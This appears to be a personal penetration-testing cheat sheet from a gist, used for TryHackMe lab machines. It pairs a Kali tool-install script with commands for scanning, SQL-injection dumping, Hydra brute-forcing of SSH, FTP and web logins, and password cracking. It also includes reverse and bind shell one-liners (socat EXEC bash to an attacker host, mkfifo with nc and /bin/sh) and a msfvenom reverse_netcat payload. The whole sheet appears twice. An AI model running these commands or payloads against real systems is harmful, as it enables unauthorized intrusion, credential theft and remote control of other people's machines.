AshtonIzmev/kali_THM_boostrap.sh

## kali_THM_boostrap.sh
docker pull kalilinux/kali-rolling

apt-get update

# Password
apt install -y hydra \
  metasploit-framework \ # ! > 1gb
  hashcat \ # needs GPU
  nikto # webserver security

# Password
snap install john-the-ripper

# Openvpn
apt install -y network-manager-openvpn \
  network-manager-pptp \
  network-manager-strongswan \
  network-manager-vpnc

# Utils
apt install -y vim

# Networking
apt install -y inetutils-tools \
  iputils-ping

# Utils
apt install -y nfs-common
apt install -y default-mysql-client

# Wordlist
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
apt install seclists

# Pen
https://github.com/JohnHammond/poor-mans-pentest
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

# Hash
wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py

## thm_steps.sh

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Steps ?

nmap -A -sV $IP > nmap_sv.output
nmap -sV -Pn -n -F $IP > nmap_common.output
sudo masscan -e tun0 -p1-65535,U:1-65535 $IP --rate=1000 > masscan_violence.output
nmap -sV -Pn -n -p$P1,$P2,$P3,... $IP > nmap_sniper.output
sudo nmap -A -sS -p- $IP > nmap_ss.output


## if 80 in open_ports
gobuster -u http://$IP  -w ~/Documents/big_gobuster.txt -x "txt,html,pdf" > gobuster_generic.output
gobuster -u http://$IP  -w ~/Documents/big_gobuster.txt -x "php,asp" > gobuster_php.output
nikto -h $IP -Plugins ALL > nikto_plugins.output
python3 ~/Tools/sqlmapproject-sqlmap-9a6acd2/sqlmap.py -u http://$IP --forms -a --dump > sqlmap_generic.output
# => Iterate gobuster on found directories
# => Check source code ?
# => wappalyzer for more info ?

### if apache
nikto -h $IP -Plugins apacheusers > nikto_apache.output


# End
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #


Firefox extension Wappalyser
Firefox extension Burp proxy

# List uris with jpg extension
gobuster -u $IP -w ~/Documents/common.txt -x "php,txt,html"
gobuster -u http://jewel.uploadvulns.thm/ -x "jpg" -w ~/Documents/UploadVulnsWordlist.txt

# Hexedit magic number file
hexedit $FILE

# Reverse shell
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

nc -lnvp 1234
socat TCP-L:1235 -
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

# STabilize shell
# https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

# Bin shell
mkfifo /tmp/f; nc -lvnp $PORT < /tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f

# Socat
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

# Certificat for openssl socat
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem

# Nmap
# https://nmap.org/book/port-scanning-options.html
nmap -A -sV --script $SCR -p80 10.10.X.Y

# Extract info from image
binwalk -E firmware.bin #Entropy analysis
binwalk -e img.jpg
steghide extract -sf img.jpg

# John the ripper
john-the-ripper.rar2john secure.rar > secure.rar.hash
john-the-ripper  --wordlist=/home/issam/Documents/rockyou.txt secure.rar.hash
john-the-ripper.zip2john secure.zip > secure.zip.hash
john-the-ripper  --wordlist=/home/issam/Documents/rockyou.txt secure.zip.hash
john-the-ripper --single --format=raw-md5 hash7.txt
# Hash examples here https://hashcat.net/wiki/doku.php?id=example_hashes
hashcat  a -m 0 ~/Documents/rockyou.txt -O --force


# Find CVE with nikto
# https://fossies.org/linux/nikto/program/docs/nikto_manual.html#id238272
nikto -h IP -Plugins $PLUGIN

# SQLi
python3 ~/Tools/sqlmapproject-sqlmap-9a6acd2/sqlmap.py -u http://10.10.200.158/administrator.php --forms -a --dump

# Samba enumeration
smbmap -u "admin" -p "password" -H 10.10.10.10 -x ipconfig
# SMBCLIENT https://www.samba.org/samba/docs/current/man-html/smbclient.1.html
smbclient

# Out of ideas ? Try impacket (samba, windows, kerberos, tcp)
# https://www.secureauth.com/labs/open-source-tools/impacket/

# Magic number
https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5

# Enumeration & Priv Escal
./enum4linux-ng.py -A ${TARGET_IP}
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

# Find SUID/GUID executables
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

# Kernel exploits ?
kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl

# Hydra BRUTEFORCE
## SSH
hydra -l root -P ~/Documents/rockyou.txt 192.168.1.105 -t 4 -V ssh
## FTP
hydra -l user -P ~/Documents/rockyou.txt ftp://10.10.116.47
## POST
hydra -l <username> -P <wordlist> 10.10.116.47 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V

# Spawn shell ?
https://gtfobins.github.io/

# Metasploit
msfdb start && msfconsole
## 'help' '?' 'search $CMD' 'show' 'info $CMD' 'hosts' 'services' 'analyze' 'vulns' 'use' 'exploit'
## db_nmap -sV 10.10.X.Y
## set RHOSTS $IP , set LHOST , set PAYLOAD
# https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
# Metasploit venom
msfvenom -p cmd/unix/reverse_netcat lhost=10.8.153.55 lport=4444 R


# Burp
## Send to repeater
## Send to intruder
## Do action > Intercept response


####################" QUIKCY
python3 -m http.server
wget http://10.8.153.55:8000/lse.sh http://10.8.153.55:8000/linpeas.sh http://10.8.153.55:8000/LinEnum.sh http://10.8.153.55:8000/les.sh
chmod +x LinEnum.sh linpeas.sh lse.sh les.sh

########################
# Malware analysis
########################

# Static analysis
~/Tools/floss malware.exe_
	docker pull kalilinux/kali-rolling

	apt-get update

	# Password
	apt install -y hydra \
	metasploit-framework \ # ! > 1gb
	hashcat \ # needs GPU
	nikto # webserver security

	# Password
	snap install john-the-ripper

	# Openvpn
	apt install -y network-manager-openvpn \
	network-manager-pptp \
	network-manager-strongswan \
	network-manager-vpnc

	# Utils
	apt install -y vim

	# Networking
	apt install -y inetutils-tools \
	iputils-ping

	# Utils
	apt install -y nfs-common
	apt install -y default-mysql-client

	# Wordlist
	wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
	apt install seclists

	# Pen
	https://github.com/JohnHammond/poor-mans-pentest
	https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

	# Hash
	wget https://gitlab.com/kalilinux/packages/hash-identifier/-/raw/kali/master/hash-id.py

	# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
	# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
	# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
	# Steps ?

	nmap -A -sV $IP > nmap_sv.output
	nmap -sV -Pn -n -F $IP > nmap_common.output
	sudo masscan -e tun0 -p1-65535,U:1-65535 $IP --rate=1000 > masscan_violence.output
	nmap -sV -Pn -n -p$P1,$P2,$P3,... $IP > nmap_sniper.output
	sudo nmap -A -sS -p- $IP > nmap_ss.output


	## if 80 in open_ports
	gobuster -u http://$IP -w ~/Documents/big_gobuster.txt -x "txt,html,pdf" > gobuster_generic.output
	gobuster -u http://$IP -w ~/Documents/big_gobuster.txt -x "php,asp" > gobuster_php.output
	nikto -h $IP -Plugins ALL > nikto_plugins.output
	python3 ~/Tools/sqlmapproject-sqlmap-9a6acd2/sqlmap.py -u http://$IP --forms -a --dump > sqlmap_generic.output
	# => Iterate gobuster on found directories
	# => Check source code ?
	# => wappalyzer for more info ?

	### if apache
	nikto -h $IP -Plugins apacheusers > nikto_apache.output


	# End
	# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
	# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
	# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #




	Firefox extension Wappalyser
	Firefox extension Burp proxy

	# List uris with jpg extension
	gobuster -u $IP -w ~/Documents/common.txt -x "php,txt,html"
	gobuster -u http://jewel.uploadvulns.thm/ -x "jpg" -w ~/Documents/UploadVulnsWordlist.txt

	# Hexedit magic number file
	hexedit $FILE

	# Reverse shell
	http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
	https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

	nc -lnvp 1234
	socat TCP-L:1235 -
	socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"

	# STabilize shell
	# https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/

	# Bin shell
	mkfifo /tmp/f; nc -lvnp $PORT < /tmp/f \| /bin/sh >/tmp/f 2>&1; rm /tmp/f

	# Socat
	socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane

	# Certificat for openssl socat
	openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
	cat shell.key shell.crt > shell.pem

	# Nmap
	# https://nmap.org/book/port-scanning-options.html
	nmap -A -sV --script $SCR -p80 10.10.X.Y

	# Extract info from image
	binwalk -E firmware.bin #Entropy analysis
	binwalk -e img.jpg
	steghide extract -sf img.jpg

	# John the ripper
	john-the-ripper.rar2john secure.rar > secure.rar.hash
	john-the-ripper --wordlist=/home/issam/Documents/rockyou.txt secure.rar.hash
	john-the-ripper.zip2john secure.zip > secure.zip.hash
	john-the-ripper --wordlist=/home/issam/Documents/rockyou.txt secure.zip.hash
	john-the-ripper --single --format=raw-md5 hash7.txt
	# Hash examples here https://hashcat.net/wiki/doku.php?id=example_hashes
	hashcat a -m 0 ~/Documents/rockyou.txt -O --force


	# Find CVE with nikto
	# https://fossies.org/linux/nikto/program/docs/nikto_manual.html#id238272
	nikto -h IP -Plugins $PLUGIN

	# SQLi
	python3 ~/Tools/sqlmapproject-sqlmap-9a6acd2/sqlmap.py -u http://10.10.200.158/administrator.php --forms -a --dump

	# Samba enumeration
	smbmap -u "admin" -p "password" -H 10.10.10.10 -x ipconfig
	# SMBCLIENT https://www.samba.org/samba/docs/current/man-html/smbclient.1.html
	smbclient

	# Out of ideas ? Try impacket (samba, windows, kerberos, tcp)
	# https://www.secureauth.com/labs/open-source-tools/impacket/

	# Magic number
	https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5

	# Enumeration & Priv Escal
	./enum4linux-ng.py -A ${TARGET_IP}
	https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
	https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh
	https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

	# Find SUID/GUID executables
	find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

	# Kernel exploits ?
	kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl

	# Hydra BRUTEFORCE
	## SSH
	hydra -l root -P ~/Documents/rockyou.txt 192.168.1.105 -t 4 -V ssh
	## FTP
	hydra -l user -P ~/Documents/rockyou.txt ftp://10.10.116.47
	## POST
	hydra -l <username> -P <wordlist> 10.10.116.47 http-post-form "/login.php:username=^USER^&password=^PASS^:F=incorrect" -V

	# Spawn shell ?
	https://gtfobins.github.io/

	# Metasploit
	msfdb start && msfconsole
	## 'help' '?' 'search $CMD' 'show' 'info $CMD' 'hosts' 'services' 'analyze' 'vulns' 'use' 'exploit'
	## db_nmap -sV 10.10.X.Y
	## set RHOSTS $IP , set LHOST , set PAYLOAD
	# https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
	# Metasploit venom
	msfvenom -p cmd/unix/reverse_netcat lhost=10.8.153.55 lport=4444 R


	# Burp
	## Send to repeater
	## Send to intruder
	## Do action > Intercept response


	####################" QUIKCY
	python3 -m http.server
	wget http://10.8.153.55:8000/lse.sh http://10.8.153.55:8000/linpeas.sh http://10.8.153.55:8000/LinEnum.sh http://10.8.153.55:8000/les.sh
	chmod +x LinEnum.sh linpeas.sh lse.sh les.sh

	########################
	# Malware analysis
	########################

	# Static analysis
	~/Tools/floss malware.exe_